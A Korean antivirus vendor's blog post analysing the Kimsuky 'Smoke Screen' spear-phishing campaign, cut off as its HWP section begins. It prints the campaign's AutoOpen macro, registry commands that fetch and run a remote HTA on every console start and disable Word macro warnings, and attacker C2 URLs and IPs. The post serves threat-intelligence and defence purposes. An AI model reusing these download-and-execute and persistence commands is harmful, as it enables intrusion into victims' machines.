<div class="inner_content"> <div class="section_area detail_area"> <h2 class="blind">상세 컨텐츠</h2> <!-- 글제목 --> <div class="box_article_tit"> <h3 class="blind">본문 제목</h3> <p class="txt_sub_tit">암호화된 APT 공격, Kimsuky 조직의 '스모크 스크린' PART 2</p> <div class="sub_tit_info"> <span class="category"> <span class="txt_style"><a href="/category/%EC%95%85%EC%84%B1%EC%BD%94%EB%93%9C%20%EB%B6%84%EC%84%9D%20%EB%A6%AC%ED%8F%AC%ED%8A%B8">악성코드 분석 리포트</a></span></span> <p class="info_meta"> <span class="name">by <span class="txt_style">알약(Alyac)</span></span> <span class="date">2019. 5. 13. 17:34</span> </p> </div> </div> <!-- //글제목 --> <!-- 본문 --> <div class="box_article"> <h3 class="blind">본문</h3> <div class="article_cont"> <!-- 본문 내용 (치환자 적용 영역) --> <div class="article_util"> <button type="button" class="util_like"> <span class="blind">좋아요</span> <i class="icon_font icon-favorite-o"></i> <!-- 좋아요 클릭 시 쿨래스 변경 빈하트 class="icon-favorite-o", 채움 하트 class="icon-favorite" --> <span class="txt_count">-</span> </button> <div class="box_util"> <!-- 댓글 달기 버튼 링크 이슈 있음 by osh --> <button type="button" class="util_comment" href=""> <span class="blind">댓글달기</span> <i class="icon_font icon-chat-o"></i> <span class="txt_count">0</span> </button> </div> </div> <!-- System - START --> <!-- System - END --> <div class="tt_article_useless_p_margin contents_style"><p style="text-align: center; clear: none; float: none;"><span class="imageblock" style="display: inline-block; width: 692px; height: auto; max-width: 100%;"><img src="https://t1.daumcdn.net/cfile/tistory/99122D365CD9FCC925" style="" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99122D365CD9FCC925" width="692" height="440" filename="27.jpg" filemime="image/jpeg"/></span></p><p style="text-align: center; clear: none; float: none;"><br /></p><p><br /></p><p><span style="font-size: 12pt;">안녕하세요? 이스트시큐리티 시큐리티 대응센터(이하 ESRC) 입니다.</span></p><p><br /></p><p><span style="font-size: 12pt;">지난 04월 17일 "</span><a href="https://blog.alyac.co.kr/2243" target="_blank" class="tx-link"><span style="font-size: 12pt;"><b>한ㆍ미 겨냥 APT 캠페인 '스모크 스크린' Kimsuky 실체 공개</b></span></a><span style="font-size: 12pt;">" 리포팅을 통해 한국과 미국을 대상으로 은밀하게 수행 중인 APT 공격의 배후가 드러난 바 있습니다.</span></p><p><br /></p><p><span style="font-size: 12pt;">약 한달이 지난 지금까지도 '스모크 스크린' 캠페인을 벌인 조직의 대남, 대미 사이버 첩보 활동이 멈추지 않고 있습니다.</span></p><p><br /></p><p><span style="font-size: 12pt;">흥미로운 점은 이들이 한국과 미국을 상대로 스피어 피싱(Spear Phishing) 공격을 수행하면서, 보안 탐지 시스템을 간단하게 우회하고 있다는 것입니다.</span></p><p><br /></p><p><br /></p><div class="txc-textbox" style="border-style: solid; border-width: 1px; border-color: rgb(231, 253, 181); background-color: rgb(231, 253, 181); padding: 10px;"><p><span style="font-size: 12pt;"><b><span style="color: rgb(0, 0, 0); font-size: 14pt;">■ 보안 기밀 문서로 위장한 연막(스모크 스크린) 작전 배경</span></b></span></p></div><p><br /></p><p><br /></p><p><span style="font-size: 12pt;">ESRC는 한국과 미국의 북한관련 분야에 종사하는 전문직만 겨냥한 이들의 활동을 관찰하고 분석하면서 공통적인 단서를 목격할 수 있었습니다.</span></p><p><br /></p><p><span style="font-size: 12pt;">한국을 대상으로 할 경우에는 주로 HWP 문서 파일의 취약점을 쓰고, 미국을 표적으로 삼을 경우에는 DOC 문서 기반의 맞춤형 미끼를 활용하는 것입니다.</span><br /></p><p><br /></p><p><span style="font-size: 12pt;">특히, 유사 악성 파일을 탐지하는 보안 시스템을 우회하기 위해 각 문서 작성 소프트웨어의 자체 암호 기능을 적용하고 있습니다.</span></p><p><br /></p><p><span style="font-size: 12pt;">다수의 보안 서비스들은 기존에 알려진 악성 패턴이 존재하거나, 잠재적으로 유해 가능 코드를 식별하기 위해 다양한 문서 포맷의 내부에 접근하여야 하는데, 자체 암호화 기능이 적용된 경우 이러한 분석이 어렵기 때문입니다.</span></p><p><br /></p><p><span style="font-size: 12pt;">그렇기 때문에 바이러스 토탈(Virus Total) 서비스에 실제 악성으로 알려진 APT 공격용 문서 파일의 탐지 비율이 현저히 낮거나, 암호를 확인하기 전까진 판단이 지연 또는 보류될 수 있고, 이는 아주 정상적인 결과입니다.</span></p><p><br /></p><p><br /></p><div class="txc-textbox" style="border-style: dashed; border-width: 1px; border-color: rgb(121, 165, 228); background-color: rgb(219, 232, 251); padding: 10px;"><p><span style="font-size: 12pt;">- </span><a href="https://www.virustotal.com/gui/file/71a7f7d3afc2288c82e1d2fd9813efc6e15f8f283091f7bc48ac2beaf1e488d4/detection" target="_blank" class="tx-link"><span style="font-size: 12pt;">https://www.virustotal.com/gui/file/71a7f7d3afc2288c82e1d2fd9813efc6e15f8f283091f7bc48ac2beaf1e488d4/detection</span></a></p><p><br /></p><p><span style="font-size: 12pt;">- </span><a href="https://www.virustotal.com/gui/file/efdbd34ee6ebc148e09b29ceb06d6417185970b5a7a2b2459c0d3e119a1e372e/detection" target="_blank" class="tx-link"><span style="font-size: 12pt;">https://www.virustotal.com/gui/file/efdbd34ee6ebc148e09b29ceb06d6417185970b5a7a2b2459c0d3e119a1e372e/detection</span></a></p><p><br /></p><p><span style="font-size: 12pt;">- </span><a href="https://www.virustotal.com/gui/file/2b35f9c3c530eca7ae587109fbb227097a56d21e9d9359704805be3cc2c4c5bc/detection" target="_blank" class="tx-link"><span style="font-size: 12pt;">https://www.virustotal.com/gui/file/2b35f9c3c530eca7ae587109fbb227097a56d21e9d9359704805be3cc2c4c5bc/detection</span></a></p><p><br /></p><p><span style="font-size: 12pt;">- </span><a href="https://www.virustotal.com/gui/file/b964e53b75932092489937fa9647b7d128d6c799511a024c53909c3dfdf20d24/detection" target="_blank" class="tx-link"><span style="font-size: 12pt;">https://www.virustotal.com/gui/file/b964e53b75932092489937fa9647b7d128d6c799511a024c53909c3dfdf20d24/detection</span></a></p></div><p><br /></p><p><br /></p><div class="txc-textbox" style="border-style: solid; border-width: 1px; border-color: rgb(231, 253, 181); background-color: rgb(231, 253, 181); padding: 10px;"><p><span style="font-size: 12pt;"><b><span style="font-size: 14pt; color: rgb(0, 0, 0);">■ APT 위협 조직의 고유한 아이디와 다양한 단서들 </span></b></span></p></div><p><br /></p><p><br /></p><p><span style="font-size: 12pt;">ESRC에서는 지난 4월 '스모크 스크린' 캠페인을 통해 위협 배후가 사용하는 각종 컴퓨터 계정명과 이메일 주소, SNS, 메신저 정보들을 공개한 바 있습니다.</span></p><p><br /></p><p><br /></p><table class="txc-table" width="173" cellspacing="0" cellpadding="0" border="0" style="border: none; border-collapse: collapse; width: 173px;" 맑은="" 고딕",="" sans-serif;font-size:16px"=""><tbody><tr><td style="width: 172px; height: 24px; border-width: 1px; border-style: solid; border-color: rgb(204, 204, 204);"><p><span style="font-size: 12pt;"> windowsmb</span></p></td> </tr> <tr><td style="width: 172px; height: 24px; border-bottom: 1px solid rgb(204, 204, 204); border-right: 1px solid rgb(204, 204, 204); border-left: 1px solid rgb(204, 204, 204);"><p><span style="font-size: 12pt;"> JamFedura</span></p></td> </tr> <tr><td style="width: 172px; height: 24px; border-bottom: 1px solid rgb(204, 204, 204); border-right: 1px solid rgb(204, 204, 204); border-left: 1px solid rgb(204, 204, 204);"><p><span style="font-size: 12pt;"> Aji</span></p></td> </tr> <tr><td style="width: 172px; height: 24px; border-bottom: 1px solid rgb(204, 204, 204); border-right: 1px solid rgb(204, 204, 204); border-left: 1px solid rgb(204, 204, 204);"><p><span style="font-size: 12pt;"> snow8949</span></p></td> </tr> <tr><td style="width: 172px; height: 24px; border-bottom: 1px solid rgb(204, 204, 204); border-right: 1px solid rgb(204, 204, 204); border-left: 1px solid rgb(204, 204, 204);"><p><span style="font-size: 12pt;"> JamShine1993</span></p></td> </tr> <tr><td style="width: 172px; height: 24px; border-bottom: 1px solid rgb(204, 204, 204); border-right: 1px solid rgb(204, 204, 204); border-left: 1px solid rgb(204, 204, 204);"><p><span style="font-size: 12pt;"> tiger199392</span></p></td> </tr> <tr><td style="width: 172px; height: 24px; border-bottom: 1px solid rgb(204, 204, 204); border-right: 1px solid rgb(204, 204, 204); border-left: 1px solid rgb(204, 204, 204);"><p><span style="font-size: 12pt;"> jamfedura0293</span></p></td> </tr> <tr><td style="width: 172px; height: 24px; border-bottom: 1px solid rgb(204, 204, 204); border-right: 1px solid rgb(204, 204, 204); border-left: 1px solid rgb(204, 204, 204);"><p><span style="font-size: 12pt;"> 코인짱1985</span></p></td> </tr> <tr><td style="width: 172px; height: 24px; border-bottom: 1px solid rgb(204, 204, 204); border-right: 1px solid rgb(204, 204, 204); border-left: 1px solid rgb(204, 204, 204);"><p><span style="font-size: 12pt;"> tiger1993</span></p></td> </tr> <tr><td style="width: 172px; height: 24px; border-bottom: 1px solid rgb(204, 204, 204); border-right: 1px solid rgb(204, 204, 204); border-left: 1px solid rgb(204, 204, 204);"><p><span style="font-size: 12pt;"> aji9170</span></p></td> </tr> <tr><td style="width: 172px; height: 24px; border-bottom: 1px solid rgb(204, 204, 204); border-right: 1px solid rgb(204, 204, 204); border-left: 1px solid rgb(204, 204, 204);"><p><span style="font-size: 12pt;"> aji199293</span></p></td> </tr> <tr><td style="width: 172px; height: 24px; border-bottom: 1px solid rgb(204, 204, 204); border-right: 1px solid rgb(204, 204, 204); border-left: 1px solid rgb(204, 204, 204);"><p><span style="font-size: 12pt;"> rjh917</span></p></td> </tr> <tr><td style="width: 172px; height: 24px; border-bottom: 1px solid rgb(204, 204, 204); border-right: 1px solid rgb(204, 204, 204); border-left: 1px solid rgb(204, 204, 204);"><p><span style="font-size: 12pt;"> devAji917</span></p></td> </tr> <tr><td style="width: 172px; height: 24px; border-bottom: 1px solid rgb(204, 204, 204); border-right: 1px solid rgb(204, 204, 204); border-left: 1px solid rgb(204, 204, 204);"><p><span style="font-size: 12pt;"> Fungsyujonggu</span></p></td> </tr> <tr><td style="width: 172px; height: 24px; border-bottom: 1px solid rgb(204, 204, 204); border-right: 1px solid rgb(204, 204, 204); border-left: 1px solid rgb(204, 204, 204);"><p><span style="font-size: 12pt;"> om197019621993</span></p></td> </tr> <tr><td style="width: 172px; height: 24px; border-bottom: 1px solid rgb(204, 204, 204); border-right: 1px solid rgb(204, 204, 204); border-left: 1px solid rgb(204, 204, 204);"><p><span style="font-size: 12pt;"> tom</span></p></td> </tr> <tr><td style="width: 172px; height: 24px; border-bottom: 1px solid rgb(204, 204, 204); border-right: 1px solid rgb(204, 204, 204); border-left: 1px solid rgb(204, 204, 204);"><p><span style="font-size: 12pt;"> faeofua</span></p></td> </tr> </tbody></table><p><br /></p><p><br /></p><p><span style="font-size: 12pt;">특히, 이들이 사이버 첩보 활동뿐만 아니라, 암호화폐 및 사행성 도박게임 분야의 전문 개발자로 둔갑해 각종 프리랜서 사이트에서 소프트웨어 개발 대행 업무 및 비트코인 거래를 통한 외화벌이에 집중하고 있다는 실체가 세상에 드러난 바 있습니다.</span></p><p><br /></p><p><span style="font-size: 12pt;">그리고 카카오톡, 텔레그램, 스카이프 등을 통해 개인별 1:1 사이버 접선 방식을 통해 다양한 교류를 시도한 점은 사이버 위협이 갈수록 대담해지고, 우리 주변까지 가깝게 다가온 것을 단적으로 보여준 사례입니다.</span></p><p><br /></p><p><br /></p><div class="txc-textbox" style="border-style: solid; border-width: 1px; border-color: rgb(231, 253, 181); background-color: rgb(231, 253, 181); padding: 10px;"><p><span style="font-size: 14pt;"><b><span style="color: rgb(0, 0, 0);">■ 5월 수행된 실제 공격 벡터 #1 (DOC 기반 사례)</span></b></span></p></div><p><br /></p><p><br /></p><p><span style="font-size: 12pt;">2019년 05월 현재, '스모크 스크린' 캠페인은 계속 진행되고 있으며, 북한과 관련된 연구 및 해당 분야에 종사하는 한</span><a href="https://blog.alyac.co.kr/2243" target="_blank" class="tx-link"><span style="font-size: 12pt;">ㆍ</span></a><span style="font-size: 12pt;">미 관계자가 주요 표적이 되고 있습니다.</span></p><p><br /></p><p><span style="font-size: 12pt;">05월 01일 포착된 것은 04월 29일 제작된 악성 DOC 문서가 첨부된 스피어 피싱 공격으로 부터 시작되었습니다.</span></p><p><br /></p><p><span style="font-size: 12pt;">이 공격은 동북아 안보 문제와 북한을 전문적으로 연구하는 미국의 특정 싱크탱크 소속의 연구원이 보낸 내용처럼 위장하였습니다.</span></p><p><br /></p><p><span style="font-size: 12pt;">루어(Lure)를 포함한 캐스팅 플로우는 기존에 알려진 방식과 큰 차이는 없지만, 한국에서 주로 쓰이던 문서 암호 설정 방식이 도입되었습니다.</span></p><p><br /></p><p><span style="font-size: 12pt;">문서에 사용된 보안 요구 화면이 지나면, 다음과 같이 보안 경고 메시지와 함께 매크로 실행을 유도하게 됩니다. 여기서 [콘텐츠 실행] 버튼을 클릭해 매크로 기능이 작동되면, 예상대로 악의적인 기능이 수행됩니다.</span></p><p><br /></p><p><br /></p><p style="text-align: center; clear: none; float: none;"><span class="imageblock" style="display: inline-block; width: 618px; height: auto; max-width: 100%;"><img src="https://t1.daumcdn.net/cfile/tistory/992BB4425CD92B2528" style="max-width: 100%; height: auto;" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F992BB4425CD92B2528" width="618" height="665" filename="01.PNG" filemime="image/jpeg"/></span></p><p style="text-align: center; clear: none; float: none;"><span style="font-size: 12pt;">[그림 1] 암호가 입력된 악성 DOC 문서가 실행된 후 보여지는 화면</span></p><p><br /></p><p><br /></p><p><span style="font-size: 12pt;">미국을 상대로 진행된 공격용 문서가 한국어 기반으로 작성된 것을 볼 수 있는데, 이는 공격자가 한글버전의 윈도우 운영체제를 사용하고 있다는 단서 중 하나 입니다.</span></p><p><br /></p><p><span style="font-size: 12pt;">그리고 이 문서를 가장 마지막에 수정한 계정이 '스모크 스크린' 캠페인에서 공개한 바 있는 'windowsmb' 계정과 정확히 일치합니다.</span></p><p><br /></p><p><br /></p><p style="text-align: center; clear: none; float: none;"><span class="imageblock" style="display: inline-block; width: 339px; height: auto; max-width: 100%;"><img src="https://t1.daumcdn.net/cfile/tistory/9913D6365CD7DB3631" style="max-width: 100%; height: auto;" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F9913D6365CD7DB3631" width="339" height="178" filename="02.PNG" filemime="image/jpeg"/></span></p><p style="text-align: center;"><span style="font-size: 12pt;">[그림 2] 악성 문서 파일을 마지막으로 수정한 'windowsmb' 화면</span><br /></p><p><br /></p><p><br /></p><p><span style="font-size: 12pt;">DOC 악성 문서의 매크로에는 다음과 같은 코드가 포함되어 있으며, 암호를 설정해 편집이나 분석을 하지 못하도록 방해합니다.</span></p><p><br /></p><p><br /></p><div class="txc-textbox" style="border-style: dashed; border-width: 1px; border-color: rgb(203, 203, 203); background-color: rgb(255, 255, 255); padding: 10px;"><p><span style="font-size: 12pt;">' module: ThisDocument</span></p><p><br /></p><p><span style="font-size: 12pt;">Attribute VB_Name = "ThisDocument"</span></p><p><span style="font-size: 12pt;">Attribute VB_Base = "1Normal.ThisDocument"</span></p><p><span style="font-size: 12pt;">Attribute VB_GlobalNameSpace = False</span></p><p><span style="font-size: 12pt;">Attribute VB_Creatable = False</span></p><p><span style="font-size: 12pt;">Attribute VB_PredeclaredId = True</span></p><p><span style="font-size: 12pt;">Attribute VB_Exposed = True</span></p><p><span style="font-size: 12pt;">Attribute VB_TemplateDerived = True</span></p><p><span style="font-size: 12pt;">Attribute VB_Customizable = True</span></p><p><br /></p><p><br /></p><p><span style="font-size: 12pt;">' module: NewMacros</span></p><p><br /></p><p><span style="font-size: 12pt;">Attribute VB_Name = "NewMacros"</span></p><p><span style="font-size: 12pt;">Sub AutoOpen()</span></p><p><span style="font-size: 12pt;">'</span></p><p><span style="font-size: 12pt;">' AutoOpen Macro</span></p><p><span style="font-size: 12pt;">'</span></p><p><span style="font-size: 12pt;">Shell ("mshta https://bit-albania.com/sekretar_bit_shkurt2019/webs/rez/us/Ahfzo0[.]hta")</span></p><p><span style="font-size: 12pt;">End Sub</span></p></div><p><br /></p><p><br /></p><p><span style="font-size: 12pt;">쉘 명령으로 작동하는 'Ahfzo0.hta' 파일에는 다음과 같은 비주얼 베이직 스크립트 코드 명령을 가지고 있습니다.</span></p><p><br /></p><p><br /></p><p style="text-align: center; clear: none; float: none;"><span class="imageblock" style="display: inline-block; width: 368px; height: auto; max-width: 100%;"><img src="https://t1.daumcdn.net/cfile/tistory/9913B2455CD8D26738" style="max-width: 100%; height: auto;" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F9913B2455CD8D26738" width="368" height="236" filename="03.png" filemime="image/jpeg"/></span></p><p style="text-align: center;"><span style="font-size: 12pt;">[그림 3] 'Ahfzo0.hta' 코드 내부 화면</span></p><p><span style="font-size: 12pt;"> </span></p><p><br /></p><p><span style="font-size: 12pt;">'expres.php?op=1' 사이트로 접근할 경우 인코딩된 php 명령이 로드되며, hta 파일에서 인코딩 키로 선언된 '11' 값을 통해 디코딩 절차를 거치게 됩니다.</span></p><p><br /></p><p><span style="font-size: 12pt;">디코딩된 후 수행되는 명령에는 'pwzpz.js', 'nqtas.vbs', 'tmp.bat' 등의 쉘 스크립트와 파워쉘 명령을 담고 있습니다.</span></p><p><br /></p><p><br /></p><div class="txc-textbox" style="border-style: dashed; border-width: 1px; border-color: rgb(203, 203, 203); background-color: rgb(255, 255, 255); padding: 10px;"><p><span style="font-size: 12pt;">wShell=new ActiveXObject("WScript.Shell");retu=wShell.run("cmd.exe /c timeout 5 & taskkill /im cmd.exe",0,true);</span></p></div><p><br /></p><p><br /></p><div class="txc-textbox" style="border-style: dashed; border-width: 1px; border-color: rgb(203, 203, 203); background-color: rgb(255, 255, 255); padding: 10px;"><p><span style="font-size: 12pt;">On Error Resume Next:Set wShell=CreateObject("WScript.Shell"):file_bat= wShell.ExpandEnvironmentStrings("%appdata%") & "\tmp.bat":retu=wShell.run("cmd.exe /c timeout 5 &"""&file_bat&"""",0,true)</span></p></div><p><br /></p><p><br /></p><div class="txc-textbox" style="border-style: dashed; border-width: 1px; border-color: rgb(203, 203, 203); background-color: rgb(255, 255, 255); padding: 10px;"><p><span style="font-size: 12pt;">reg add "HKEY_CURRENT_USER\Software\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "powershell.exe start-process -windowstyle hidden -filepath mshta.exe https://bit-albania.com/sekretar_bit_shkurt2019/webs/rez/us/Ahfzo[.]hta" /f & reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security" /v VBAWarnings /t REG_DWORD /d "1" /f& reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Security" /v VBAWarnings /t REG_DWORD /d "1" /f& reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security" /v VBAWarnings /t REG_DWORD /d "1" /f & del "%appdata%\tmp.bat"</span></p></div><p><br /></p><p><br /></p><p><span style="font-size: 12pt;">그리고 정상적인 문서 파일을 다운로드해 로딩하는 과정을 거치게 됩니다.</span></p><p><br /></p><p><br /></p><p style="text-align: center; clear: none; float: none;"><span class="imageblock" style="display: inline-block; width: 730px; height: auto; max-width: 100%;"><img src="https://t1.daumcdn.net/cfile/tistory/99F8884C5CD92B4A26" style="max-width: 100%; height: auto;" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99F8884C5CD92B4A26" width="730" height="733" filename="04.png" filemime="image/jpeg"/></span></p><p style="text-align: center; clear: none; float: none;"><span style="font-size: 12pt;">[그림 4] 추가 다운로드 후 보여지는 정상 문서 화면</span></p><p><br /></p><p><br /></p><p><span style="font-size: 12pt;">공격자가 구축한 서버는 다음과 같은 구조를 가지고 있으며, 다양한 원격 명령을 통해 추가 악성코드를 설치할 수 있습니다.</span></p><p><br /></p><p><br /></p><div class="txc-textbox" style="border-style: dashed; border-width: 1px; border-color: rgb(203, 203, 203); background-color: rgb(255, 255, 255); padding: 10px;"><p><span style="font-size: 12pt;">- bit-albania.com/sekretar_bit_shkurt2019/webs/rez/us/Ahfzo0[.]hta</span></p><p><span style="font-size: 12pt;">- bit-albania.com/sekretar_bit_shkurt2019/webs/rez/us/Ahfzo[.]hta</span></p><p><span style="font-size: 12pt;">- bit-albania.com/sekretar_bit_shkurt2019/webs/rez/us/expres[.]php?op=1</span></p><p><span style="font-size: 12pt;">- bit-albania.com/sekretar_bit_shkurt2019/webs/rez/us/upload[.]php</span></p><p><span style="font-size: 12pt;">- bit-albania.com/sekretar_bit_shkurt2019/webs/rez/us/cow[.]php?op=cow[.]gif</span></p><p><span style="font-size: 12pt;">- bit-albania.com/sekretar_bit_shkurt2019/webs/rez/us/cow_pass[.]gif</span></p><p><span style="font-size: 12pt;">- bit-albania.com/sekretar_bit_shkurt2019/webs/rez/us/cow[.]php?op=exe[.]gif</span></p><p><span style="font-size: 12pt;">- bit-albania.com/sekretar_bit_shkurt2019/webs/rez/us/cow[.]php?op=dll[.]gif</span></p><p><span style="font-size: 12pt;">- bit-albania.com/sekretar_bit_shkurt2019/webs/rez/us/power_dir[.]gif</span></p><p><span style="font-size: 12pt;">- bit-albania.com/sekretar_bit_shkurt2019/webs/rez/us/power_com[.]gif</span></p><p><span style="font-size: 12pt;">- bit-albania.com/sekretar_bit_shkurt2019/webs/rez/us/power_com_wow[.]gif</span></p><p><span style="font-size: 12pt;">- bit-albania.com/sekretar_bit_shkurt2019/webs/rez/us/power_exe[.]gif</span></p><p><span style="font-size: 12pt;">- bit-albania.com/sekretar_bit_shkurt2019/webs/rez/us/power_exe_del[.]gif</span></p><p><span style="font-size: 12pt;">- bit-albania.com/sekretar_bit_shkurt2019/webs/rez/us/power_key[.]gif</span></p><p><span style="font-size: 12pt;">- bit-albania.com/sekretar_bit_shkurt2019/webs/rez/us/power_key_j[.]gif</span></p><p><span style="font-size: 12pt;">- bit-albania.com/sekretar_bit_shkurt2019/webs/rez/us/power_kill[.]gif</span></p><p><span style="font-size: 12pt;">- bit-albania.com/sekretar_bit_shkurt2019/webs/rez/us/asist[.]gif</span></p><p><span style="font-size: 12pt;">- bit-albania.com/sekretar_bit_shkurt2019/webs/rez/us/asist_vbs_getfiles[.]gif</span></p><p><span style="font-size: 12pt;">- bit-albania.com/sekretar_bit_shkurt2019/webs/rez/us/asist_vbs_exe_down[.]gif</span></p><p><span style="font-size: 12pt;">- bit-albania.com/sekretar_bit_shkurt2019/webs/rez/us/drop[.]gif</span></p><p><span style="font-size: 12pt;">- bit-albania.com/sekretar_bit_shkurt2019/webs/rez/us/blackip[.]txt</span></p><p><span style="font-size: 12pt;">- bit-albania.com/sekretar_bit_shkurt2019/webs/rez/us/resp[_]suspect</span></p><p></p></div><p><br /></p><p><br /></p><p><span style="font-size: 12pt;">특히, 접속자들의 아이피 주소와 컴퓨터 정보들을 수집해 분석 환경일 경우 방해하는 기능도 존재하며, 공격자의 의도에 따라 암호화된 악성 코드를 설치할 수 있는데, 원격제어(RAT) 등의 피해로 이어질 수 있습니다.</span></p><p><br /></p><p><br /></p><p style="text-align: center; clear: none; float: none;"><span class="imageblock" style="display: inline-block; width: 542px; height: auto; max-width: 100%;"><img src="https://t1.daumcdn.net/cfile/tistory/99397F3C5CD92B6828" style="max-width: 100%; height: auto;" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99397F3C5CD92B6828" width="542" height="500" filename="05.png" filemime="image/jpeg"/></span></p><p style="text-align: center; clear: none; float: none;"><span style="font-size: 12pt;">[그림 5] 디코딩된 명령어 화면</span></p><p><br /></p><p><br /></p><p><span style="font-size: 12pt;">'cow.gif', 'exe.gif' 파일은 Base64 기반으로 인코딩된 형태의 악성 코드이며, 일부는 리버스 루틴이 적용되어 있습니다.</span></p><p><br /></p><p><br /></p><table class="txc-table" width="764" cellspacing="0" cellpadding="0" border="0" style="border:none;border-collapse:collapse;;font-family:" 맑은="" 고딕",="" sans-serif;font-size:16px"=""><tbody><tr><td style="width:382;height:24;border-bottom:1px solid #ccc;border-right:1px solid #ccc;border-top:1px solid #ccc;border-left:1px solid #ccc;;"><p><span style="font-size: 12pt;"> File Name</span></p></td> <td style="width:382;height:24;border-bottom:1px solid #ccc;border-right:1px solid #ccc;border-top:1px solid #ccc;;"><p><span style="font-size: 12pt;"> cow.gif</span></p></td> </tr> <tr><td style="width:382;height:24;border-bottom:1px solid #ccc;border-right:1px solid #ccc;border-left:1px solid #ccc;;"><p><span style="font-size: 12pt;"> MD5</span></p></td> <td style="width:382;height:24;border-bottom:1px solid #ccc;border-right:1px solid #ccc;;"><p><span style="font-size: 12pt;"> 0e595fb4462e99f392d441d960f8bc93</span></p></td> </tr> </tbody></table><p><br /></p><table class="txc-table" width="764" cellspacing="0" cellpadding="0" border="0" style="border:none;border-collapse:collapse;;font-family:" 맑은="" 고딕",="" sans-serif;font-size:16px"=""><tbody><tr><td style="width:382;height:24;border-bottom:1px solid #ccc;border-right:1px solid #ccc;border-top:1px solid #ccc;border-left:1px solid #ccc;;"><p><span style="font-size: 12pt;"> File Name</span></p></td> <td style="width:382;height:24;border-bottom:1px solid #ccc;border-right:1px solid #ccc;border-top:1px solid #ccc;;"><p><span style="font-size: 12pt;"> exe.gif</span></p></td> </tr> <tr><td style="width:382;height:24;border-bottom:1px solid #ccc;border-right:1px solid #ccc;border-left:1px solid #ccc;;"><p><span style="font-size: 12pt;"> MD5</span></p></td> <td style="width:382;height:24;border-bottom:1px solid #ccc;border-right:1px solid #ccc;;"><p><span style="font-size: 12pt;"> d264875dab332d3475b99461310d7fff</span></p></td> </tr> </tbody></table><p><br /></p><p><br /></p><p><span style="font-size: 12pt;">복호화를 거치면, 'EGIS Co., Ltd.' 디지털 서명을 가진 악성 파일이 확인됩니다.</span></p><p><br /></p><p><br /></p><p style="text-align: center; clear: none; float: none;"><span class="imageblock" style="display: inline-block; width: 470px; height: auto; max-width: 100%;"><img src="https://t1.daumcdn.net/cfile/tistory/993A11415CD92B852E" style="max-width: 100%; height: auto;" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F993A11415CD92B852E" width="470" height="550" filename="06.png" filemime="image/jpeg"/></span></p><p style="text-align: center; clear: none; float: none;"><span style="font-size: 12pt;">[그림 6] EGIS 디지털 서명 화면</span></p><p><br /></p><p><br /></p><p><span style="font-size: 12pt;">복호화된 DLL 파일의 경우에는 다음과 같은 PDB 값을 가지고 있으며, Mutex 값은 '__START_MYTEST_MARKuuuii__' 입니다.</span></p><p><br /></p><p><br /></p><div class="txc-textbox" style="border-style: solid; border-width: 1px; border-color: rgb(238, 238, 238); background-color: rgb(238, 238, 238); padding: 10px;"><p><span style="font-size: 12pt;">- L:\TEMP_WORK\VC_work\rrrr_dllload.dll_OK\Release\rrrr.pdb</span></p></div><p><br /></p><p><br /></p><p style="text-align: center; clear: none; float: none;"><span class="imageblock" style="display: inline-block; width: 664px; height: auto; max-width: 100%;"><img src="https://t1.daumcdn.net/cfile/tistory/99B6D13A5CD8F3D014" style="max-width: 100%; height: auto;" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99B6D13A5CD8F3D014" width="664" height="178" filename="07.png" filemime="image/jpeg"/></span></p><p style="text-align: center;"><span style="font-size: 12pt;">[그림 7] rrrr.pdb 화면</span></p><p><br /></p><p><br /></p><p><br /></p><p><span style="font-size: 12pt;">'cow.gif' 파일의 경우에는 중국어로 빌드된 악성 Dll 파일인데, PCRat 원격제어 프로그램의 'Server.dll' 파일 기능을 수행하게 되며, '173.248.170.149' 서버로 통신을 시도하게 됩니다. </span></p><p><br /></p><p><span style="font-size: 12pt;">공격자는 기존에 공개되어 있던 PCRat 프로그램을 통해 악성 코드를 제작했으며, 일부 버전은 소스 코드가 인터넷에 공유되어 있습니다.</span></p><p><br /></p><p><span style="font-size: 12pt;">ESRC에서는 2017년 동일한 공격 조직이 명령제어(C2) 서버에서 PCRat 공격자용을 발견한 바 있고, 이곳에서는 한글로 복사본 흔적도 목격된 바 있습니다.</span></p><p><br /></p><p><br /></p><p style="text-align: center; clear: none; float: none;"><span class="imageblock" style="display: inline-block; width: 608px; height: auto; max-width: 100%;"><img src="https://t1.daumcdn.net/cfile/tistory/9931173F5CD92BA922" style="max-width: 100%; height: auto;" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F9931173F5CD92BA922" width="608" height="920" filename="08.png" filemime="image/jpeg"/></span></p><p style="text-align: center; clear: none; float: none;"><span style="font-size: 12pt;">[그림 8] 2017년 C2 서버에서 발견된 PCRat 화면</span></p><p><br /></p><p><br /></p><div class="txc-textbox" style="border-style: solid; border-width: 1px; border-color: rgb(231, 253, 181); background-color: rgb(231, 253, 181); padding: 10px;"><p><span style="font-size: 14pt;"><b><span style="color: rgb(0, 0, 0);">■ 5월 수행된 실제 공격 벡터 #2 (HWP 기반 사례)</span></b></span></p></div><p><span style="font-size: 12pt;"> </span><br /></p><p><br /></p><p><span style="font-size: 